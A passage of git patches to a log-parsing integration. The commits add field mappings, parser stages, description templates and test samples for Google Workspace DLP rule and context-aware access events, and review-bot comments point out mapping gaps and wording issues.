@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was 
enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account 
Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 14:24:35 +0100 Subject: [PATCH 17/84] Add rules service --- Google Cloud/google-report/_meta/fields.yml | 25 +++++++++ .../_meta/smart-descriptions.json | 50 +++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 23 ++++++++ .../tests/test_rules_sample_1.json | 55 +++++++++++++++++++ .../tests/test_rules_sample_2.json | 55 +++++++++++++++++++ 5 files changed, 208 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json 
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..fd683eea8 100644
--- a/Google Cloud/google-report/_meta/fields.yml
+++ b/Google Cloud/google-report/_meta/fields.yml
@@ -33,6 +33,31 @@ google.report.parameters.visibility:
 name: google.report.parameters.visibility
 type: keyword
+google.report.rule.data_source:
+ description: Data source
+ name: google.report.rule.data_source
+ type: keyword
+
+google.report.rule.name:
+ description: Name of the rule
+ name: google.report.rule.name
+ type: keyword
+
+google.report.rule.scan_type:
+ description: Scan type
+ name: google.report.rule.scan_type
+ type: keyword
+
+google.report.rule.severity:
+ description: Severity of the rule
+ name: google.report.rule.severity
+ type: keyword
+
+google.report.rule.type:
+ description: Rule type
+ name: google.report.rule.type
+ type: keyword
+
 google.report.token.app_name:
 description: Token authorization application name
 name: google.report.token.app_name
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..9b88f06de 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,56 @@
 }
 ]
 },
+ {
+ "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "rules"
+ },
+ {
+ "field": "event.action",
+ "value": "action_complete"
+ },
+ {
+ "field": "google.report.rule.severity"
+ },
+ {
+ "field": "google.report.rule.name"
+ },
+ {
+ "field": "google.report.rule.data_source"
+ },
+ {
+ "field": "google.report.rule.type"
+ }
+ ]
+ },
+ {
+ "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "rules"
+ },
+ {
+ "field": "event.action",
+ "value": "content_matched"
+ },
+ {
+ "field": "google.report.rule.severity"
+ },
+ {
+ "field": "google.report.rule.name"
+ },
+ {
+ "field": "google.report.rule.data_source"
+ },
+ {
+ "field": "google.report.rule.type"
+ }
+ ]
+ },
 {
+ "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
+ "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..e9640ba28 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -28,6 +28,8 @@ pipeline:
 filter: '{{ json_event.message.id.applicationName == "admin"}}'
 - name: set_vault_fields
 filter: '{{ json_event.message.id.applicationName == "vault"}}'
+ - name: set_rules_fields
+ filter: '{{ json_event.message.id.applicationName == "rules"}}'
 - name: set_parameters_fields
 filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
@@ -258,3 +260,24 @@ stages:
 {%- endif -%}
 {% endfor %}
 {{ types|unique|list }}
+
+ set_rules_fields:
+ actions:
+ - set:
+ google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["info"]
+ filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}'
+
+ - set:
+ event.type: ["deletion"]
+ filter: '{{ json_event.message.events[0].name == "label_removed"}}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}'
diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json
new file mode 100644
index 000000000..3f7ef889b
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_rules_sample_1.json
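Review bot: The new `set_rules_fields` stage reads only `json_event.message.events[0]`, so if a report activity carries more than one event (`events` is a list in both test samples) the rule parameters of any later event are silently never mapped; the existing `set_parameters_fields` filter uses the same `events[0]` convention, so this may be a deliberate project-wide simplification, but the stage should say so with a comment such as `# only the first event of an activity is mapped`. Separately, the parameters that make a DLP event actionable in the sample — `triggered_actions`, `matched_detectors`, `resource_id`, `resource_owner_email` and `resource_recipients` — are not extracted, so a detection built on this intake can see that a rule matched but not what was done about it or on which resource; consider adding keyword fields for at least the triggered action and the resource identifier. The three `event.type` filters also leave any event whose name is outside the listed values without a type, which is worth a comment if intentional.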
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": 
"LOW",
+ "type": "DLP"
+ }
+ }
+ },
+ "network": {
+ "application": "rules"
+ },
+ "related": {
+ "user": [
+ "john.doe"
+ ]
+ },
+ "user": {
+ "domain": "test.com",
+ "email": "john.doe@test.com",
+ "id": "11332867018361686666666",
+ "name": "john.doe"
+ }
+ }
+}
\ No newline at end of file
From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 16:42:34 +0100 Subject: [PATCH 18/84] Add context access service
--- Google Cloud/google-report/_meta/fields.yml | 5 ++ .../_meta/smart-descriptions.json | 18 ++++++ Google Cloud/google-report/ingest/parser.yml | 10 ++++ .../tests/test_access_sample_1.json | 58 +++++++++++++++++++ 4 files changed, 91 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..4fc31cc4b 100644
--- a/Google Cloud/google-report/_meta/fields.yml
+++ b/Google Cloud/google-report/_meta/fields.yml
@@ -1,3 +1,8 @@
+google.report.access.application:
+ description: Application name
+ name: google.report.access.application
+ type: keyword
+
 google.report.actor.email:
 description: ''
 name: google.report.actor.email
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..51fcc1837 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,24 @@
 }
 ]
 },
+ {
+ "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "context_aware_access"
+ },
+ {
+ "field": "user.email"
+ },
+ {
+ "field": "event.action"
+ },
+ {
+ "field": "google.report.access.application"
+ }
+ ]
+ },
 {
+ "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
+ "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..25f2888b2 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -1,4 +1,5 @@
 name: google-report
+ignored_values: ["UNKNOWN"]
 pipeline:
 - name: json_event
 external:
@@ -28,6 +29,8 @@ pipeline:
 filter: '{{ json_event.message.id.applicationName == "admin"}}'
 - name: set_vault_fields
 filter: '{{ json_event.message.id.applicationName == "vault"}}'
+ - name: set_context_aware_fields
+ filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}'
 - name: set_parameters_fields
 filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
@@ -258,3 +261,10 @@ stages:
 {%- endif -%}
 {% endfor %}
 {{ types|unique|list }}
+
+ set_context_aware_fields:
+ actions:
+ - set:
+ event.type: ["denied"]
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json
new file mode 100644
index 000000000..e83076db1
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_access_sample_1.json
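Review bot: The new `context_aware_access` description string begins with a stray space (`" Access to …"`), which will render as a leading blank in every generated description; it should read `"Access to {google.report.access.application} was denied for {user.email} : {event.action}"`. The wording "was denied" is also applied to every `context_aware_access` event regardless of `event.action`, and the only sample event name, `MONITOR_MODE_ACCESS_DENY_EVENT`, looks like a monitor-mode (log-only) evaluation rather than an enforced block, so an analyst reading the description may overstate what actually happened; conditioning the entry on the enforced event name, or wording monitor-mode events as "would have been denied", would be more accurate. The same assumption is baked into the parser.yml hunk `@@ -258,3 +261,10 @@` of this commit, where `event.type: ["denied"]` is set unconditionally for the whole application.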
